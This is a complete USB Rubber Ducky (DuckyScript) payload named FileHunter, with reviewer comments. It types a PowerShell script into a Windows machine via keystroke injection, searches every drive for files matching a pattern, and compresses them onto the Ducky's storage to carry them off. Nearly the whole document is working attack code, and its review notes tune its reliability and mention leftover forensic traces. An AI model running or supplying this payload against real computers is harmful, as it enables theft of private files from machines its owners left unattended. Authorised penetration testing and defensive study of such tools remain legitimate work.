REM Title: FileHunter
REM Description: Crawls all drives of the target system for a specific file or file type, to then compress and exfiltrate them to the Ducky.
REM Author: 0i41E
REM Version: 1.0
REM Category: Exfiltration
REM Attackmodes: HID, Storage
REM
REM NOTE(review): the exfil destination is the Ducky's own mass-storage volume, which the
REM PowerShell below locates by volume label (#NAME); the Ducky must be labeled to match
REM or nothing is written to it.
REM NOTE(review): the crawl runs as the logged-in user unless the payload is elevated, and
REM Get-ChildItem is called with -ErrorAction SilentlyContinue, so unreadable drives and
REM folders are skipped without any indication.

REM HID for typing the payload, STORAGE so the Ducky shows up as the drive the archive is saved to.
ATTACKMODE HID STORAGE
REM Extension made by Korben to increase speed
EXTENSION DETECT_READY
REM VERSION 1.1
REM AUTHOR: Korben

REM_BLOCK DOCUMENTATION
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay: CAPSLOCK is pressed repeatedly until the host reports the lock
state back ($_CAPSLOCK_ON), i.e. until the HID device is enumerated and the
OS is actually processing keystrokes.

TARGETS:
Any system that reflects CAPSLOCK will detect minimum required delay
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
(#ITERATION_LIMIT * #RESPONSE_DELAY = 120 * 25ms)
END_REM

REM CONFIGURATION:
REM Milliseconds to wait after each press for the host to reflect the lock state.
DEFINE #RESPONSE_DELAY 25
REM Upper bound on presses; caps the worst case at #ITERATION_LIMIT * #RESPONSE_DELAY.
DEFINE #ITERATION_LIMIT 120

VAR $C = 0
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
CAPSLOCK
DELAY #RESPONSE_DELAY
$C = ($C + 1)
END_WHILE
REM On a reflecting host the loop exits with CAPSLOCK on; this press turns it back off so
REM the payload body is typed in normal case. NOTE(review): on a host that never reflects
REM the state the loop runs all #ITERATION_LIMIT presses and this extra press makes the
REM total odd, so such a target may be left with CAPSLOCK on - verify on those targets.
CAPSLOCK
END_EXTENSION
REM Extension by 0i41E, to signalize the successful execution of the payload
EXTENSION DETECT_FINISHED
REM VERSION 1.0
REM AUTHOR: 0i41E

REM_BLOCK DOCUMENTATION
USAGE:
Use the function Detect_Finished() to signal the finished execution of your payload.
It blinks the target's CAPSLOCK LED (4 toggles if CAPSLOCK is currently off, 3 if it is on,
so the lock ends up off either way) and then issues ATTACKMODE OFF, which ends the session;
it must therefore be the last thing the payload does.
END_REM

REM CONFIGURATION:
REM Milliseconds between LED toggles (the visible blink rate).
DEFINE #PAUSE 150
FUNCTION Detect_Finished()
REM Branch on the current lock state so the blink always finishes with CAPSLOCK off.
IF ($_CAPSLOCK_ON == FALSE)
CAPSLOCK
DELAY #PAUSE
CAPSLOCK
DELAY #PAUSE
CAPSLOCK
DELAY #PAUSE
CAPSLOCK
ATTACKMODE OFF
REM NOTE(review): this ELSE IF carries no condition and is presumably meant as a plain ELSE -
REM confirm it compiles to the else branch in the DuckyScript version you target.
ELSE IF
CAPSLOCK
DELAY #PAUSE
CAPSLOCK
DELAY #PAUSE
CAPSLOCK
ATTACKMODE OFF
END_IF
END_FUNCTION
END_EXTENSION
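REM Define the file name or type by using a wildcard i.e. *.pdf
REM NOTE(review): this goes straight into Get-ChildItem -Filter, which delegates matching to the
REM filesystem; on NTFS that also consults 8.3 short names, so e.g. *.htm can also return .html
REM files - verify if an exact extension matters.
DEFINE #FILENAME example.jpg
REM Volume label of the Ducky's mass-storage partition; the archive is written to its root.
REM The label is embedded verbatim in a WQL filter string, so keep it free of quotes.
DEFINE #NAME Ducky

DELAY 1000
GUI r
DELAY 500
STRINGLN powershell -nop -noni
REM You may want to add Windows_Elevated_Execution, if you want full access to all drives and directories
DELAY 2000
REM Everything between STRINGLN_POWERSHELL and END_STRINGLN is typed line by line into the
REM interactive console, so "} else {" stays on one line (a lone "}" would close the statement
REM early) and the script is left unindented to save keystrokes.
REM Changes versus the 1.0 body of this payload:
REM  - if no volume labeled #NAME exists the script reports it and collects nothing, instead of
REM    writing "out.zip" and the staging folder relative to the current directory on the target;
REM  - the Ducky volume itself and the staging folder are excluded from the crawl;
REM  - files that share a name no longer overwrite each other in the staging folder;
REM  - Compress-Archive and the disclosure note are skipped when nothing was found;
REM  - the CAPSLOCK completion signal is sent on every path, so WAIT_FOR_CAPS_ON cannot hang.
REM NOTE(review): mapped network drives are FileSystem PSDrives too and will be crawled, which is
REM slow and noisy; files are staged in cleartext under %TEMP% before compression and the folder
REM is deleted afterwards, but filesystem metadata of that staging likely remains for forensics.
STRINGLN_POWERSHELL
$vol = Get-WmiObject Win32_Volume -Filter "Label='#NAME'" | Select-Object -First 1
$root = $vol.Name
if (-not $root) {
Write-Host -ForegroundColor Red "No volume labeled '#NAME' found; nothing collected."
} else {
$out = Join-Path -Path $root -ChildPath "out.zip"
$store = Join-Path -Path $env:TEMP -ChildPath "Found"
if (Test-Path $store) { Remove-Item -Recurse -Force $store }
New-Item -ItemType Directory -Path $store | Out-Null
Get-PSDrive -PSProvider FileSystem | Where-Object { $_.Root -and ($_.Root -ne $root) } | ForEach-Object {
$drive = $_.Root
try {
Get-ChildItem -Path $drive -Recurse -File -Filter "#FILENAME" -ErrorAction SilentlyContinue |
Where-Object { -not $_.FullName.StartsWith($store, [System.StringComparison]::OrdinalIgnoreCase) } |
ForEach-Object {
$dest = Join-Path -Path $store -ChildPath $_.Name
$i = 0
while (Test-Path $dest) { $i++; $dest = Join-Path -Path $store -ChildPath ("{0}_{1}" -f $i, $_.Name) }
Copy-Item -Path $_.FullName -Destination $dest -Force
}
} catch {
Write-Host "Error: drive ${drive}: $_" -ForegroundColor Red
}
}
if (Get-ChildItem -Path $store -File) {
if (Test-Path $out) { Remove-Item -Force $out }
Write-Host -ForegroundColor Yellow "Saving files to Ducky. This may take a while..."
Compress-Archive -Path "$store\*" -DestinationPath $out
$note = Join-Path -Path ([Environment]::GetFolderPath('Desktop')) -ChildPath "fyi.txt"
echo "Certain of your Files where exfiltrated, using a Rubber Ducky (Identified as #NAME)" > $note
} else {
Write-Host -ForegroundColor Yellow "No files matching '#FILENAME' were found."
}
Remove-Item -Recurse -Force $store
}
(New-Object -ComObject wscript.shell).SendKeys('{CAPSLOCK}');exit
END_STRINGLN
DELAY 150
ENTER
DELAY 250
WAIT_FOR_CAPS_ON
REM NOTE(review): Detect_Finished() ends with ATTACKMODE OFF, which detaches the storage the
REM archive was just written to; this delay is a grace period for the OS to finish flushing
REM writes to the removable volume - raise it if archives come back truncated.
DELAY 1000
Detect_Finished()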